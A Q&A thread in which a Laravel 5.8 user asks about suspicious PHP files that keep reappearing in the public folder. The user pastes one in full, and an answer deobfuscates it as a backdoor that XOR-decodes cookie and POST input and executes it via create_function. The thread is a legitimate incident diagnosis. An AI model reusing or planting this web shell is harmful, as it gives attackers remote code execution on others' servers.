# Weird php file under laravel5.8 public folder

Tags: laravel, security, laravel-5.8

Under my *Laravel* application's public folder, there are some suspicious`php` files with weird name like "`8xmzujk2.php`".

Even though I try to delete those files one or two times, those files appear again after two or three days. I use the window server with apache. There are no record in apache's access and error log at the time those files are created.

If anyone encounter this issue before, please kindly suggest me the steps to solve this issue. All the suggestion are welcome. Thanks in advance.

The code inside this one of suspicious php file is as below.

```php
<?php
$groqw = 'e-xv2i4_3r78g0*6kypmcoustndl#5\'b19aHf';$vcdoidm = Array();$vcdoidm[] = $groqw[35].$groqw[14];$vcdoidm[] = $groqw[20].$groqw[9].$groqw[0].$groqw[34].$groqw[24].$groqw[0].$groqw[7].$groqw[36].$groqw[22].$groqw[25].$groqw[20].$groqw[24].$groqw[5].$groqw[21].$groqw[25];$vcdoidm[] = $groqw[33].$groqw[36].$groqw[8].$groqw[34].$groqw[13].$groqw[10].$groqw[34].$groqw[32].$groqw[1].$groqw[29].$groqw[33].$groqw[4].$groqw[20].$groqw[1].$groqw[6].$groqw[10].$groqw[13].$groqw[32].$groqw[1].$groqw[11].$groqw[36].$groqw[13].$groqw[15].$groqw[1].$groqw[29].$groqw[29].$groqw[31].$groqw[10].$groqw[15].$groqw[0].$groqw[33].$groqw[13].$groqw[32].$groqw[33].$groqw[34].$groqw[34];$vcdoidm[] = $groqw[28];$vcdoidm[] = $groqw[20].$groqw[21].$groqw[22].$groqw[25].$groqw[24];$vcdoidm[] = $groqw[23].$groqw[24].$groqw[9].$groqw[7].$groqw[9].$groqw[0].$groqw[18].$groqw[0].$groqw[34].$groqw[24];$vcdoidm[] = $groqw[0].$groqw[2].$groqw[18].$groqw[27].$groqw[21].$groqw[26].$groqw[0];$vcdoidm[] = $groqw[23].$groqw[22].$groqw[31].$groqw[23].$groqw[24].$groqw[9];$vcdoidm[] = $groqw[34].$groqw[9].$groqw[9].$groqw[34].$groqw[17].$groqw[7].$groqw[19].$groqw[0].$groqw[9].$groqw[12].$groqw[0];$vcdoidm[] = $groqw[23].$groqw[24].$groqw[9].$groqw[27].$groqw[0].$groqw[25];$vcdoidm[] = $groqw[18].$groqw[34].$groqw[20].$groqw[16];foreach ($vcdoidm[8]($_COOKIE, $_POST) as $cpaxpnw => $afkxx){function dlvrss($vcdoidm, $cpaxpnw, $eowcms){return $vcdoidm[7]($vcdoidm[5]($cpaxpnw . $vcdoidm[2], ($eowcms / $vcdoidm[9]($cpaxpnw)) + 1), 0, $eowcms);}function isfap($vcdoidm, $eeqhx){return @$vcdoidm[10]($vcdoidm[0], $eeqhx);}function eeejy($vcdoidm, $eeqhx){$jfvsqg = $vcdoidm[4]($eeqhx) % 3;if (!$jfvsqg) {$ykpentn = $vcdoidm[1]; $fggryc = $ykpentn("", $eeqhx[1]($eeqhx[2]));$fggryc();exit();}}$afkxx = isfap($vcdoidm, $afkxx);eeejy($vcdoidm, $vcdoidm[6]($vcdoidm[3], $afkxx ^ dlvrss($vcdoidm, $cpaxpnw, $vcdoidm[9]($afkxx))));}
```

Answer (score 2):

That strip of code runs arbitrary code sent in the post and cookies of a request

Here is the clearer version of it

```php
foreach (array_merge($_COOKIE, $_POST) as $index => $value){
    function dlvrss($vcdoidm, $index, $eowcms){
        return substr(str_repeat($index . "9f3a07a1-592c-4701-8f06-55b76e9019aa", ($eowcms / strlen($index)) + 1), 0, $eowcms);
    }
    function isfap($vcdoidm, $eeqhx){
        return @pack("H*", $eeqhx);
    }
    function eeejy($vcdoidm, $eeqhx){
        $jfvsqg = count($eeqhx) % 3;
        if (!$jfvsqg) {
            $fggryc = create_function("", $eeqhx[1]($eeqhx[2]));
            $fggryc();
            exit();
        }
    }
    $value = isfap($vcdoidm, $value);
    eeejy($vcdoidm, explode("#", $value ^ dlvrss($vcdoidm, $index, strlen($value))));
}
```

See how in the end it runs a function sent in the request via

```php
$fggryc = create_function("", $eeqhx[1]($eeqhx[2]));
$fggryc();`
```

You should have that fixed.

@Edit

I dont know how, sorry.

Comment: firstly, thanks for your help. Any suggestion to fix this issue ?
May I also know where this compressed files are stored, on my server (or) other server ?